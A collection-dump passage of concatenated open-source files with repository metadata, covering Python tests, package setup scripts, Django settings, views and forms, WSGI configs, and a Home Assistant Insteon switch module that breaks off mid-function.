"license": "bsd-3-clause",
"language": [
{
"name": "HTML",
"bytes": "618"
},
{
"name": "Python",
"bytes": "26727"
}
],
"symlink_target": ""
} |
import numpy as np
from ...tests.instance import gaussian_instance
from ..lasso import data_carving, data_splitting
def sim():
X, Y, _, active, sigma = gaussian_instance()
print(sigma)
G = data_carving.gaussian(X, Y, 1., split_frac=0.9, sigma=sigma)
G.fit()
if set(active).issubset(G.active) and G.active.shape[0] > len(active):
return [G.hypothesis_test(G.active[len(active)], burnin=5000, ndraw=10000)]
return []
def sim2():
X, Y, _, active, sigma = gaussian_instance(n=150, s=3)
G = data_splitting.gaussian(X, Y, 5., split_frac=0.5, sigma=sigma)
G.fit(use_full=True)
if set(active).issubset(G.active) and G.active.shape[0] > len(active):
return [G.hypothesis_test(G.active[len(active)])]
return []
| {
"content_hash": "dc8a0065bb36efad273201ab6b50234c",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 83,
"avg_line_length": 36.38095238095238,
"alnum_prop": 0.650523560209424,
"repo_name": "selective-inference/selective-inference",
"id": "2e140e0a298a673768e25d8897e50820ff1fbabf",
"size": "764",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "selectinf/algorithms/tests/test_data_carving.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "269"
},
{
"name": "C++",
"bytes": "13148"
},
{
"name": "Python",
"bytes": "572490"
},
{
"name": "R",
"bytes": "11134"
},
{
"name": "TeX",
"bytes": "3355"
}
],
"symlink_target": ""
} |
"""
Meraki API Setup module.
"""
from os import path
from codecs import open as codecs_open
from setuptools import setup, find_packages
from meraki_api import __version__
HERE = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with codecs_open(path.join(HERE, 'README.rst'), encoding='utf-8') as f:
LONG_DESCRIPTION = f.read()
# unittests
import unittest
def meraki_api_test_suite():
test_loader = unittest.TestLoader()
test_suite = test_loader.discover('tests', pattern='test_*.py')
return test_suite
setup(
name='meraki_api',
version=__version__,
description='Meraki Dashboard API wrapper.',
long_description=LONG_DESCRIPTION,
url='https://github.com/guzmonne/meraki_api',
# Author details
author='Guzmán Monné',
author_email='[email protected]',
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
# Github archive
download_url=(
"https://github.com/guzmonne/meraki_api/archive/"
+ __version__
+ ".tar.gz"
),
# What does your project relate to?
keywords='api development',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=['requests'],
test_suite='setup.meraki_api_test_suite',
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
#extras_require={
# 'dev': ['check-manifest'],
# 'test': ['coverage'],
#},
)
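# Hypothetical usage (not part of the original file): the test_suite hook
# declared above lets setuptools discover and run the bundled tests, e.g.:
#
#     python setup.py test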
| {
"content_hash": "a7532d654e0845980e0be1710274fd03",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 77,
"avg_line_length": 34.534246575342465,
"alnum_prop": 0.6390321301071004,
"repo_name": "guzmonne/meraki_api",
"id": "a3d87c752c03f0a9b8a423c00e1928ec8006a84b",
"size": "2547",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "757"
},
{
"name": "Python",
"bytes": "89849"
}
],
"symlink_target": ""
} |
import pytest
from mock import call, sentinel
from ensime_shared.editor import Editor
@pytest.fixture
def editor(vim):
mockeditor = Editor(vim)
assert vim.mock_calls == [call.eval("has('nvim')")]
vim.reset_mock() # Clear above constructor vim calls from call list
return mockeditor
def test_append(editor, vim):
editor.append('new')
editor.append('new', sentinel.lineno)
buffer = vim.current.buffer
assert buffer.mock_calls == [
call.append('new'),
call.append('new', sentinel.lineno),
]
def test_current_word(editor, vim):
editor.current_word()
vim.eval.assert_called_with('expand("<cword>")')
def test_doautocmd(editor, vim):
editor.doautocmd('BufLeave')
editor.doautocmd('BufReadPre', 'BufRead', 'BufEnter')
assert vim.mock_calls == [
call.command('doautocmd BufLeave'),
call.command('doautocmd BufReadPre,BufRead,BufEnter'),
]
def test_edit(editor, vim):
editor.edit('foo.scala')
vim.command.assert_called_with('edit foo.scala')
def test_getlines(editor, vim):
# The buffer objects behave like sequences
lines = ['line 1', 'line2', 'line3']
vim.current.buffer = lines[:]
assert editor.getlines() == lines
class TestMenu:
prompt = 'Choose one:'
choices = ['one', 'two', 'three']
def test_choice(self, editor, vim):
# Stub the user's inputlist choice
vim.eval.return_value = 2
choice = editor.menu(self.prompt, self.choices)
assert choice == 'two'
positional = vim.eval.call_args[0]
assert 'inputlist' in positional[0]
def test_none(self, editor, vim):
vim.eval.return_value = 0
choice = editor.menu(self.prompt, self.choices)
assert choice is None
def test_set_filetype(editor, vim):
editor.set_filetype('package_info')
editor.set_filetype('package_info', 3)
assert vim.mock_calls == [
call.command('set filetype=package_info'),
call.command('3bufdo set filetype=package_info'),
]
def test_set_buffer_options(editor, vim):
# Stub Buffer object's mapping API for options, see `:h python-buffer`
setlocal = {}
vim.current.buffer.options = setlocal
opts = {'buftype': 'nofile', 'buflisted': False}
editor.set_buffer_options(opts)
assert setlocal == opts
class TestSplitWindow:
def test_creates_empty_splits(self, editor, vim):
editor.split_window(None)
editor.split_window(None, vertical=True)
assert vim.mock_calls == [call.command('new'), call.command('vnew')]
def test_creates_file_splits(self, editor, vim):
editor.split_window('foo.scala')
editor.split_window('foo.scala', vertical=True)
assert vim.mock_calls == [
call.command('split foo.scala'),
call.command('vsplit foo.scala'),
]
def test_can_size_splits(self, editor, vim):
editor.split_window('foo.scala', size=50)
vim.command.assert_called_once_with('50split foo.scala')
def test_sets_buffer_options(self, editor, mocker):
# Stub actual implementation, it's already tested
editor.set_buffer_options = mocker.stub()
editor.split_window('foo.scala', bufopts=sentinel.bufopts)
editor.set_buffer_options.assert_called_once_with(sentinel.bufopts)
def test_write(editor, vim):
editor.write()
editor.write(noautocmd=True)
assert vim.mock_calls == [
call.command('write'),
call.command('noautocmd write'),
]
| {
"content_hash": "7dafb23e0f44b69bc7ab444781fc3755",
"timestamp": "",
"source": "github",
"line_count": 129,
"max_line_length": 76,
"avg_line_length": 27.426356589147286,
"alnum_prop": 0.6458451102317694,
"repo_name": "ensime/ensime-vim",
"id": "708e86e605be848398a968f43b823429ea55dbed",
"size": "3555",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_editor.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Gherkin",
"bytes": "4104"
},
{
"name": "Makefile",
"bytes": "1458"
},
{
"name": "Python",
"bytes": "118775"
},
{
"name": "Vim script",
"bytes": "12841"
}
],
"symlink_target": ""
} |
from openturns import *
TESTPREAMBLE()
RandomGenerator.SetSeed(0)
try:
distribution = Beta(0.2, 0.6, -1.0, 2.0)
size = 10000
sample = distribution.getSample(size)
factory = BetaFactory()
estimatedDistribution = factory.build(sample)
print "distribution=", repr(distribution)
print "Estimated distribution=", repr(estimatedDistribution)
distribution = Beta(0.5, 1.3, -1.0, 2.0)
sample = distribution.getSample(size)
estimatedDistribution = factory.build(sample)
print "distribution=", repr(distribution)
print "Estimated distribution=", repr(estimatedDistribution)
distribution = Beta(0.5, 2.3, -1.0, 2.0)
sample = distribution.getSample(size)
estimatedDistribution = factory.build(sample)
print "distribution=", repr(distribution)
print "Estimated distribution=", repr(estimatedDistribution)
distribution = Beta(1.5, 4.3, -1.0, 2.0)
sample = distribution.getSample(size)
estimatedDistribution = factory.build(sample)
print "distribution=", repr(distribution)
print "Estimated distribution=", repr(estimatedDistribution)
estimatedDistribution = factory.build()
print "Default distribution=", estimatedDistribution
estimatedDistribution = factory.build(
distribution.getParametersCollection())
print "Distribution from parameters=", estimatedDistribution
estimatedBeta = factory.buildAsBeta(sample)
print "Beta =", distribution
print "Estimated Beta=", estimatedBeta
estimatedBeta = factory.buildAsBeta()
print "Default Beta=", estimatedBeta
estimatedBeta = factory.buildAsBeta(distribution.getParametersCollection())
print "Beta from parameters=", estimatedBeta
except:
import sys
print "t_BetaFactory_std.py", sys.exc_type, sys.exc_value
| {
"content_hash": "3a14518359b6fc84c6504afc21720764",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 79,
"avg_line_length": 40.86363636363637,
"alnum_prop": 0.7246941045606229,
"repo_name": "sofianehaddad/ot-svn",
"id": "6427020847dd0c61efa42df6df41515ba577274d",
"size": "1822",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/test/t_BetaFactory_std.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "6498"
},
{
"name": "C",
"bytes": "455749"
},
{
"name": "C++",
"bytes": "10021345"
},
{
"name": "CMake",
"bytes": "240050"
},
{
"name": "FORTRAN",
"bytes": "299"
},
{
"name": "Makefile",
"bytes": "12372"
},
{
"name": "NSIS",
"bytes": "26263"
},
{
"name": "Python",
"bytes": "1221927"
},
{
"name": "R",
"bytes": "11141"
},
{
"name": "Scilab",
"bytes": "2612"
},
{
"name": "Shell",
"bytes": "20403"
},
{
"name": "TeX",
"bytes": "4250"
},
{
"name": "Visual Basic",
"bytes": "3294"
}
],
"symlink_target": ""
} |
import unittest
import random
from tests import testutils
from common import environment
from tests import testconstants
from services.repower.repower import repowerservice
from services.repower.repower.domain import repowerrequest
from services.repower.repower.domain import transactionamount
from services.repower.repower.domain import cardacceptor
from services.repower.repower_reversal import repowerreversalservice
from services.repower.repower_reversal.domain import repowerreversalrequest
class RepowerServiceTest(unittest.TestCase):
def setUp(self):
test_utils = testutils.TestUtils(environment.Environment.SANDBOX)
self._service = repowerservice.RepowerService(testconstants.TestConstants.SANDBOX_CONSUMER_KEY,
test_utils.get_private_key(),
environment.Environment.SANDBOX)
self._service_reversal = repowerreversalservice.RepowerReversalService(testconstants.TestConstants.SANDBOX_CONSUMER_KEY,
test_utils.get_private_key(),
environment.Environment.SANDBOX)
def test_repower_service(self):
trans_ref = self.trans_ref_num(19)
repower_request = repowerrequest.RepowerRequest()
repower_request.transaction_reference = trans_ref
repower_request.card_number = '5184680430000014'
transaction_amount = transactionamount.TransactionAmount()
transaction_amount.value = '000000030000'
transaction_amount.currency = '840'
repower_request.transaction_amount = transaction_amount
repower_request.local_date = '1230'
repower_request.local_time = '092435'
repower_request.channel = 'W'
repower_request.ica = '009674'
repower_request.processor_id = '9000000442'
repower_request.routing_and_transit_number = '990442082'
repower_request.merchant_type = '6532'
card_acceptor = cardacceptor.CardAcceptor()
card_acceptor.name = 'Prepaid Load Store'
card_acceptor.city = 'St Charles'
card_acceptor.state = 'MO'
card_acceptor.postal_code = '63301'
card_acceptor.country = 'USA'
repower_request.card_acceptor = card_acceptor
repower = self._service.get_repower(repower_request)
assert repower.request_id is not None
assert int(repower.request_id) > 0
assert int(repower.transaction_history.transaction.response.code) == 00
repower_reversal_request = repowerreversalrequest.RepowerReversalRequest()
repower_reversal_request.ica = '009674'
repower_reversal_request.reversal_reason = 'UNIT TEST'
repower_reversal_request.transaction_reference = trans_ref
repower_reversal = self._service_reversal.get_repower_reversal(repower_reversal_request)
assert repower_reversal.request_id is not None
assert int(repower_reversal.transaction_history.transaction.response.code) == 00
def trans_ref_num(self, x, leading_zeroes=True):
if not leading_zeroes:
return random.randint(10**(x-1), 10**x-1)
else:
if x > 6000:
return ''.join([str(random.randint(0, 9)) for i in range(x)])
else:
return str("%0." + str(x) + "d") % random.randint(0, 10**x-1) | {
"content_hash": "fe49d45af4d245dff4d91549701818bc",
"timestamp": "",
"source": "github",
"line_count": 73,
"max_line_length": 128,
"avg_line_length": 47.63013698630137,
"alnum_prop": 0.6560253091745758,
"repo_name": "M4gn4tor/mastercard-api-python",
"id": "aba5848cbf3ac0e2105228651b39a61fe9dbd798",
"size": "3477",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Tests/services/repower/repowerservicetest.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "229234"
}
],
"symlink_target": ""
} |
"""
Test `redirects.views` file
"""
from django.urls import resolve, reverse_lazy
from django.views.generic import TemplateView
import pytest
from ratelimit.mixins import RatelimitMixin
from redirects.forms import RedirectModelForm
from redirects.models import Redirect
from redirects.views import RedirectFormView, ActualRedirectView
class TestRedirectFormView:
"""
Tests for 'redirects.views.RedirectFormView'
"""
view = RedirectFormView
url = reverse_lazy('redirects:form')
def test_view_inheritance(self):
"""Test view inheritance name"""
assert isinstance(self.view(), TemplateView)
assert isinstance(self.view(), RatelimitMixin)
def test_view_url_reversing(self):
"""Test view URL reversing"""
assert str(self.url) == '/'
assert (
resolve(self.url)._func_path ==
'redirects.views.RedirectFormView'
)
def test_view_template(self):
"""Test view template name"""
assert self.view.template_name == 'redirects/form.html'
def test_view_ratelimit_config(self):
"""Test view 'django-ratelimit' config"""
assert self.view.ratelimit_key == 'ip'
assert self.view.ratelimit_rate == '5/m'
assert self.view.ratelimit_block
def test_view_allowed_methods(self):
"""Test view allowed methods"""
assert set(self.view.http_method_names) == {'get', 'post'}
def test_view_rendering(self, client):
"""Test view rendering"""
response = client.get(self.url)
assert response.status_code == 200
assert 'form' in response.context
assert isinstance(response.context['form'], RedirectModelForm)
@pytest.mark.django_db
def test_view_redirect_creation(self, monkeypatch, faker, mocker, client):
"""Test creating a new `Redirect` instance with the view"""
monkeypatch.setenv('RECAPTCHA_TESTING', 'True')
ip_address = faker.ipv4()
mocker.patch('redirects.views.get_real_ip', return_value=ip_address)
data = {
'local_path': faker.uri_path(),
'destination_url': faker.uri(),
'g-recaptcha-response': 'PASSED',
}
response = client.post(self.url, data)
assert response.status_code == 200
assert hasattr(response.context['view'], 'redirect')
assert isinstance(response.context['view'].redirect, Redirect)
redirect = response.context['view'].redirect
assert redirect.local_path == data['local_path']
assert redirect.destination_url == data['destination_url']
assert redirect.sender_ip == ip_address
class TestActualRedirectView:
"""
Tests for 'redirects.views.ActualRedirectView'
"""
view = ActualRedirectView
def test_view_inheritance(self):
"""Test view inheritance name"""
assert isinstance(self.view(), TemplateView)
@pytest.mark.django_db
def test_view_url_reversing(self, redirect):
"""Test view URL reversing"""
url = '/' + redirect.local_path
resolver = resolve(url)
assert resolver.view_name == 'redirects:redirect'
assert resolver.kwargs == {
'local_path': redirect.local_path,
}
assert (
resolver._func_path ==
'redirects.views.ActualRedirectView'
)
def test_view_template(self):
"""Test view template name"""
assert self.view.template_name == 'redirects/redirect.html'
def test_view_allowed_methods(self):
"""Test view allowed methods"""
assert set(self.view.http_method_names) == {'get'}
@pytest.mark.django_db
def test_view_rendering(self, redirect, client):
"""Test view rendering"""
url = '/' + redirect.local_path
response = client.get(url)
assert response.status_code == 200
html_redirect = (
'<meta http-equiv="refresh" content="1; url={}">'.format(
redirect.destination_url
)
).encode()
assert html_redirect in response.content
js_redirect = (
'window.location.href = "{}";'.format(redirect.destination_url)
).encode()
assert js_redirect in response.content
def test_view_rendering_with_non_existent_redirect(self, faker, client):
"""Test trying to access non existent redirect"""
url = faker.uri_path()
response = client.get(url)
assert response.status_code == 404
@pytest.mark.django_db
def test_view_clicks_counting(self, redirect, client):
"""Test redirect clicks counting"""
url = '/' + redirect.local_path
client.get(url)
client.get(url)
client.get(url)
redirect.refresh_from_db()
assert redirect.clicks == 3
| {
"content_hash": "b624fbf830171b609c27745978dcd532",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 78,
"avg_line_length": 31.448051948051948,
"alnum_prop": 0.6231674581870741,
"repo_name": "pawelad/fakester",
"id": "6bdc72ac5a33878b04cbd8fb955d33738f8ca212",
"size": "4843",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/redirects/test_views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "771"
},
{
"name": "HTML",
"bytes": "6985"
},
{
"name": "Python",
"bytes": "23725"
}
],
"symlink_target": ""
} |
"""Utility functions."""
from __future__ import unicode_literals
from datetime import datetime
from collections import OrderedDict
from builtins import str
def from_iso_date(str):
"""Convert an ISO8601 to a datetime.
Args:
str(string): The ISO8601 formatted string to convert
Returns:
A :class:`datetime` object representing the given time
"""
try:
return datetime.strptime(str, "%Y-%m-%dT%H:%M:%S.%fZ")
except ValueError:
return datetime.strptime(str, "%Y-%m-%dT%H:%M:%SZ")
def to_iso_date(timestamp):
"""Convert a UTC timestamp to an ISO8601 string.
datetime instances can be constructed in alternate timezones. This
function assumes that the given timestamp is in the UTC timezone.
Args:
timestamp(datetime): A datetime object in the UTC timezone.
Returns:
An ISO8601 formatted string representing the timestamp.
"""
return timestamp.isoformat() + 'Z'
def build_request_body(type, id, attributes=None, relationships=None):
"""Build a request body object.
A body JSON object is used for any of the ``update`` or ``create``
methods on :class:`Resource` subclasses. In normal library use you
should not have to use this function directly.
Args:
type(string): The resource type for the attribute
id(uuid): The id of the object to update. This may be ``None``
Keyword Args:
attributes(dict): A JSON dictionary of the attributes to set
        relationships(dict): A JSON dictionary of relationships to set
Returns:
A valid attribute dictionary. Often used in the ``update`` or
``create`` :class:`Resource`` methods.
"""
result = {
"data": {
"type": type
}
}
data = result['data']
if attributes is not None:
data['attributes'] = attributes
if relationships is not None:
data['relationships'] = relationships
if id is not None:
data['id'] = id
return result
def build_request_relationship(type, ids):
"""Build a relationship list.
A relationship list is used to update relationships between two
resources. Setting sensors on a label, for example, uses this
function to construct the list of sensor ids to pass to the Helium
API.
Args:
type(string): The resource type for the ids in the relationship
ids([uuid] or uuid): Just one or a list of resource uuids to use
in the relationship
Returns:
A ready to use relationship JSON object.
"""
if ids is None:
return {
'data': None
}
elif isinstance(ids, str):
return {
'data': {'id': ids, 'type': type}
}
else:
return {
"data": [{"id": id, "type": type} for id in ids]
}
def build_request_include(include, params):
"""Augment request parameters with includes.
    When one or all resources are requested, an additional set of
resources can be requested as part of the request. This function
extends the given parameters for a request with a list of resource
types passed in as a list of :class:`Resource` subclasses.
Args:
include([Resource class]): A list of resource classes to include
params(dict): The (optional) dictionary of request parameters to extend
Returns:
An updated or new dictionary of parameters extended with an
include query parameter.
"""
params = params or OrderedDict()
if include is not None:
params['include'] = ','.join([cls._resource_type() for cls in include])
return params
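# A small, hypothetical illustration (not part of the original module) of the
# request shapes the helpers above produce; the resource types and ids are
# made up.
def _example_request_shapes():
    body = build_request_body('label', None, attributes={'name': 'office'})
    # -> {'data': {'type': 'label', 'attributes': {'name': 'office'}}}
    rel = build_request_relationship('sensor', ['id-1', 'id-2'])
    # -> {'data': [{'id': 'id-1', 'type': 'sensor'},
    #              {'id': 'id-2', 'type': 'sensor'}]}
    return body, rel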
| {
"content_hash": "a44cad02f8a303b33c22a63318237911",
"timestamp": "",
"source": "github",
"line_count": 139,
"max_line_length": 79,
"avg_line_length": 26.489208633093526,
"alnum_prop": 0.6409560021727322,
"repo_name": "helium/helium-python",
"id": "126b364f1b29dfa20fdf5cf6ddb05f54a7783c69",
"size": "3682",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "helium/util.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "108839"
}
],
"symlink_target": ""
} |
"""
WSGI config for tracebin project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# This is env dependent, set it yourself.
# os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tracebin_server.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| {
"content_hash": "860dfa013667cc61240e3540e0c912d1",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 79,
"avg_line_length": 41,
"alnum_prop": 0.7973086627417998,
"repo_name": "alex/tracebin",
"id": "c2a95cb45c44d67304990449163dd6103401dbd8",
"size": "1189",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "server/tracebin_server/wsgi.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "7712"
},
{
"name": "Python",
"bytes": "96821"
}
],
"symlink_target": ""
} |
'''
Created on Aug 30, 2012
@author: vencax
'''
import re
import string
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.core.exceptions import ValidationError
from django.forms.widgets import Textarea
from .models import PC
mac_re = re.compile(r'([0-9A-Fa-f]{2}[:-]?){5}([0-9A-Fa-f]{2})')
class MyPCAdminForm(forms.ModelForm):
class Meta:
model = PC
mac = forms.CharField(widget=Textarea)
def clean_mac(self):
mac = self.cleaned_data['mac']
if not mac_re.search(mac):
            raise ValidationError(_('incorrect mac address'))
cleaned = ''
for l in mac:
if l in string.hexdigits:
cleaned += l
return cleaned
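# A hypothetical sketch (not part of the original form): the cleaning above
# keeps only hexadecimal digits, so any separators are dropped,
# e.g. '00:1A-2b:3C:4d:5E' -> '001A2b3C4d5E'.
def _example_clean_mac(raw='00:1A-2b:3C:4d:5E'):
    if not mac_re.search(raw):
        raise ValueError('incorrect mac address')
    return ''.join(ch for ch in raw if ch in string.hexdigits)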
| {
"content_hash": "fcbeaf73b0c29956378a2097a2db7b1d",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 64,
"avg_line_length": 20.944444444444443,
"alnum_prop": 0.629973474801061,
"repo_name": "stare-vaskoviny/django-dhcp-admin",
"id": "4ea2f6c9259387af1d600109b55db7572f839fc8",
"size": "754",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "dhcp_admin/forms.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "5040"
}
],
"symlink_target": ""
} |
from .base import * # NOQA
import sys
import logging.config
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATES[0]['OPTIONS'].update({'debug': True})
# Turn off debug while imported by Celery with a workaround
# See http://stackoverflow.com/a/4806384
if "celery" in sys.argv[0]:
DEBUG = False
# Django Debug Toolbar
INSTALLED_APPS += (
'debug_toolbar.apps.DebugToolbarConfig',
'django_filters',
'core',
'bootstrap3',
'select_multiple_field',
'adv_cache_tag',
'cacheops',
'rating',
'guardian',
'pure_pagination',
'spurl', # URL manipulation
'artist',
'album',
'song',
'videos',
'news',
'allauth_core',
'django.contrib.sites',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.facebook',
)
# Show emails to console in DEBUG mode
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Show thumbnail generation errors
THUMBNAIL_DEBUG = True
# Log everything to the logs directory at the top
LOGFILE_ROOT = join(dirname(BASE_DIR), 'logs')
# Reset logging
# (see http://www.caktusgroup.com/blog/2015/01/27/Django-Logging-Configuration-logging_config-default-settings-logger/)
LOGGING_CONFIG = None
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': "[%(asctime)s] %(levelname)s [%(pathname)s:%(lineno)s] %(message)s",
'datefmt': "%d/%b/%Y %H:%M:%S"
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'handlers': {
'django_log_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': join(LOGFILE_ROOT, 'django.log'),
'formatter': 'verbose'
},
'proj_log_file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': join(LOGFILE_ROOT, 'project.log'),
'formatter': 'verbose'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
}
},
'loggers': {
'django': {
'handlers': ['django_log_file'],
'propagate': True,
'level': 'DEBUG',
},
'project': {
'handlers': ['proj_log_file'],
'level': 'DEBUG',
},
'werkzeug': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
}
}
logging.config.dictConfig(LOGGING)
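# Hypothetical usage (not part of the original settings): with the dictConfig
# applied above, application code would typically obtain the project logger
# like this:
#
#     import logging
#     logger = logging.getLogger('project')
#     logger.debug('written to logs/project.log')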
SITE_ID = 1
AUTHENTICATION_BACKENDS = (
# Needed to login by username in Django admin, regardless of `allauth`
'django.contrib.auth.backends.ModelBackend',
# `allauth` specific authentication methods, such as login by e-mail
'allauth.account.auth_backends.AuthenticationBackend',
'guardian.backends.ObjectPermissionBackend',
)
ACCOUNT_USER_MODEL_USERNAME_FIELD = None
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_AUTHENTICATION_METHOD = 'email'
SOCIALACCOUNT_AUTO_SIGNUP = False
# LOGIN_REDIRECT_URL = ''
SOCIALACCOUNT_QUERY_EMAIL = True
ACCOUNT_LOGIN_ON_PASSWORD_RESET = True
ACCOUNT_LOGOUT_ON_PASSWORD_CHANGE = True
ACCOUNT_SIGNUP_FORM_CLASS = 'profiles.forms.MyCustomSignupForm'
ACCOUNT_USER_DISPLAY = lambda user: user.get_full_name() or user.email
SOCIALACCOUNT_EMAIL_VERIFICATION = "none"
ACCOUNT_FORMS = {
'login': 'allauth_core.forms.MyLoginForm',
'signup': 'allauth_core.forms.MySignupForm',
'add_email': 'allauth_core.forms.MyEmail',
'change_password': 'allauth_core.forms.MyPasswordChangeForm',
'reset_password': 'allauth_core.forms.MyPasswordResetForm',
'set_password': 'allauth_core.forms.MySetPasswordForm',
'reset_password_from_key': 'allauth_core.forms.MyResetPasswordKeyForm'
}
SOCIALACCOUNT_FORMS = {
'signup': 'allauth_core.forms.MySocialSignupForm'
}
PAGINATION_SETTINGS = {
'PAGE_RANGE_DISPLAYED': 6,
'MARGIN_PAGES_DISPLAYED': 3,
}
GUARDIAN_GET_INIT_ANONYMOUS_USER = 'accounts.models.get_anonymous_user_instance'
# GUARDIAN_MONKEY_PATCH = False
| {
"content_hash": "14249637e98253c6f781348aceb2d1c3",
"timestamp": "",
"source": "github",
"line_count": 152,
"max_line_length": 119,
"avg_line_length": 27.776315789473685,
"alnum_prop": 0.6210326859308385,
"repo_name": "contactr2m/remote_repo",
"id": "d6fe9363913ca1e197f9cfea5086591c9a4e09ab",
"size": "4222",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/Pop_Lyrics_Beta/settings/development.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "44476"
},
{
"name": "HTML",
"bytes": "97064"
},
{
"name": "JavaScript",
"bytes": "363"
},
{
"name": "Python",
"bytes": "118257"
}
],
"symlink_target": ""
} |
"""
WSGI config for project_name project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/howto/deployment/wsgi/
"""
import os
os.environ.setdefault('DJANGO_SETTINGS_MODULE',
'{{ project_name }}.conf.settings')
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
| {
"content_hash": "5f861ed985550acdc6562aac5bff9861",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 78,
"avg_line_length": 28.8,
"alnum_prop": 0.7245370370370371,
"repo_name": "bruth/wicked-django-template",
"id": "fc06ded7ad59b98ee2b04345c7409265888ebfd1",
"size": "432",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wsgi.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "CSS",
"bytes": "179928"
},
{
"name": "CoffeeScript",
"bytes": "11209"
},
{
"name": "HTML",
"bytes": "6666"
},
{
"name": "JavaScript",
"bytes": "776389"
},
{
"name": "Python",
"bytes": "24812"
}
],
"symlink_target": ""
} |
"""
Support for Insteon switch devices via local hub support.
For more details about this component, please refer to the documentation at
https://home-assistant.io/components/switch.insteon_local/
"""
import json
import logging
import os
from datetime import timedelta
from homeassistant.components.switch import SwitchDevice
from homeassistant.loader import get_component
import homeassistant.util as util
_CONFIGURING = {}
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['insteon_local']
DOMAIN = 'switch'
INSTEON_LOCAL_SWITCH_CONF = 'insteon_local_switch.conf'
MIN_TIME_BETWEEN_FORCED_SCANS = timedelta(milliseconds=100)
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=10)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Insteon local switch platform."""
insteonhub = hass.data['insteon_local']
conf_switches = config_from_file(hass.config.path(
INSTEON_LOCAL_SWITCH_CONF))
if len(conf_switches):
for device_id in conf_switches:
setup_switch(
device_id, conf_switches[device_id], insteonhub, hass,
add_devices)
else:
linked = insteonhub.get_linked()
for device_id in linked:
if linked[device_id]['cat_type'] == 'switch'\
and device_id not in conf_switches:
request_configuration(device_id, insteonhub,
linked[device_id]['model_name'] + ' ' +
linked[device_id]['sku'],
hass, add_devices)
def request_configuration(device_id, insteonhub, model, hass,
add_devices_callback):
"""Request configuration steps from the user."""
configurator = get_component('configurator')
